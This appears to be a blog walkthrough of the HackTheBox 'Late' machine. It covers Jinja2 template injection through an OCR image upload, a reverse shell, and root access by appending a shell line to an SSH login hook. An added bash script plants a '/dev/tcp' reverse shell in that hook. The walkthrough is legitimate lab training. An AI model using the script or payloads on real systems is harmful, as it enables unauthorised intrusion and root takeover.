Introduction
Hey guys, welcome back. In this post, let’s see how to solve the Late box from HTB. If you have any doubts, comment down below 👇🏾
Hacking Phases in Late
First Step: Getting In
- Checking for Open Ports with Nmap
- Looking Around the Web Pages
- Checking for Weak Spots
- Exploiting the Server’s Template Engine (SSTI)
- Grabbing the User Flag
- Moving On to Privilege Escalation
Next Step: Getting More Power
- Exploring Ways to Escalate Privileges
- Escalating through a Script that Runs on SSH Login
- Claiming Root
Let’s Begin
Hey you ❤️ Please check out my other posts, you will be amazed, and support me by following on X.
Let’s Hack Late HTB 😌
https://twitter.com/HacklikeHacker
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.156
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-1024x444.webp)
Way to User
We saw that port 80 (HTTP) was open, so I decided to take a look at the website running on the box.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-1-1024x393.webp)
As we scrolled down, we noticed two hostnames mentioned: one in a text link and the other in the support details. They were late.htb and images.late.htb.
![](https://techyrick.com/wp-content/uploads/2024/02/Squoosh-Screenshot-Feb-28-1024x612.webp)
I’m adding both hostnames to /etc/hosts on my Kali machine, pointing them at 10.10.11.156.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-28-at-9.47.48 PM-1024x377.webp)
When we go to images.late.htb, we see a different page. It has a feature for uploading an image that converts the image to text (OCR).
If you look closely, it mentions that the conversion is done with Flask.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-1024x412.webp)
I’m uploading a test image with some text to see how the feature works.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-2-1024x479.webp)
After I uploaded and scanned the image, the website returned a text file for download. It contained the text from the image, but it missed some of the text from my test image, so the OCR is not perfect.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squoosh-2.webp)
Since the site is built on Flask, whose templates are rendered by Jinja2, the OCR output is a good candidate for Server-Side Template Injection (SSTI): if the recognised text is rendered as a template instead of being inserted as a variable, anything between `{{ }}` gets evaluated. The classic probe is `{{7*7}}`, which comes back as 49 if it is evaluated. So, I used an online tool to create an image containing an SSTI payload.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-Squ-1024x697.webp)
Now, I’m uploading the image I created to the file upload feature.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-28-at-9.55.28 PM-1024x387.webp)
It downloads a new file named results.txt, just like it did before.
![](https://techyrick.com/wp-content/uploads/2024/02/Squoosh-Screenshot-Feb-28-2-1024x505.webp)
Looking at the output, we can see that our SSTI payload was evaluated rather than echoed back, which confirms the injection.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-28-Screenshot-from-1.webp)
I made a new payload image that runs the “id” command, turning the SSTI into remote code execution.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-1024x172.webp)
After downloading the result file, we can confirm that our command ran, because it contains the output of “id”.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh.webp)
Now I’m changing the payload to spawn a reverse shell back to my netcat listener, and uploading that image.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-1-1024x46.webp)
When we looked at the netcat listener again, the reverse shell had connected back!
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-1024x361.webp)
We’re grabbing the user flag from the user’s home directory.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-2-1024x725.webp)
Way to Root
Running linpeas showed a few paths that are writable by the current user.
![](https://techyrick.com/wp-content/uploads/2024/02/Screenshot-2024-02-29-at-4.00.44 PM-1024x80.webp)
I also ran pspy and noticed that the script ssh-alert.sh runs every time someone logs in over SSH.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-3-1024x470.webp)
Judging by the code, the same script also sits in the user’s home directory.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-1-1024x629.webp)
Because the script (and the directory it lives in) was writable by us, and it runs on every SSH login, I appended my reverse shell one-liner to the bash script.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-4-1024x41.webp)
Now, connecting to the machine over SSH with my own key, we notice some strange behaviour during the login.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-Screenshot-from-Squoosh-5.webp)
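The privilege escalation above, as an added example that is not from the original post: check that the login hook is really writable, append (never overwrite) a reverse shell line so the script keeps doing its job, and trigger it with an SSH login. The hook path, the listener address and the username are assumptions; use the path pspy printed.

```bash
#!/usr/bin/env bash
# Added example: turn a root-executed, user-writable script into a root shell.
# HOOK is an assumed path; replace it with the script pspy showed running on login.
set -eu

HOOK="${HOOK:-/usr/local/sbin/ssh-alert.sh}"   # assumption: path shown by pspy
ATTACKER_IP="${ATTACKER_IP:-10.10.14.5}"        # assumption: your listener
ATTACKER_PORT="${ATTACKER_PORT:-4444}"

# Verdict before touching anything: missing, read-only, or writable.
# Remember -w is true for root even on a 0444 file, so run this as the low-priv user.
assess_hook() {
    local f="$1"
    [ -f "$f" ] || { echo "missing"; return 0; }
    [ -w "$f" ] || { echo "read-only"; return 0; }
    echo "writable"
}

# Find who runs the hook: PAM (pam_exec) or cron entries that reference the path.
# lsattr matters too: an append-only ('a') file accepts 'echo >>' but rejects an
# editor's save, which is the usual reason a "writable" script will not open in vi.
hook_references() {
    grep -rl -- "$1" /etc/pam.d /etc/cron* 2>/dev/null || true
    lsattr "$1" 2>/dev/null || true
}

# Append a backgrounded reverse shell so the original script still runs and the
# SSH login is not held open by our shell. Prints the line that was appended.
plant_reverse_shell() {
    local f="$1" line
    line=$(printf 'bash -c "bash -i >& /dev/tcp/%s/%s 0>&1" &' "$ATTACKER_IP" "$ATTACKER_PORT")
    printf '\n%s\n' "$line" >>"$f"
    tail -n1 "$f"
}

# Usage: ./plant.sh go   (then start nc -lvnp 4444 and SSH in to fire the hook)
if [ "${1:-}" = go ]; then
    [ "$(assess_hook "$HOOK")" = writable ] || { echo "$HOOK is not writable" >&2; exit 1; }
    hook_references "$HOOK"
    plant_reverse_shell "$HOOK"
    echo "now: ssh -i ~/.ssh/id_rsa user@late.htb   # username is an assumption"
fi
```

The login that triggers the hook needs a key the target accepts, so put your public key in the user’s ~/.ssh/authorized_keys from the existing shell first. Because the hook blocks the SSH session until it returns, the `&` keeps the login from hanging forever while your reverse shell is open.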
When I looked at my netcat listener again, I had a reverse shell as root.
![](https://techyrick.com/wp-content/uploads/2024/02/Feb-29-1-1024x378.webp)
The flag can be found in the root’s home directory.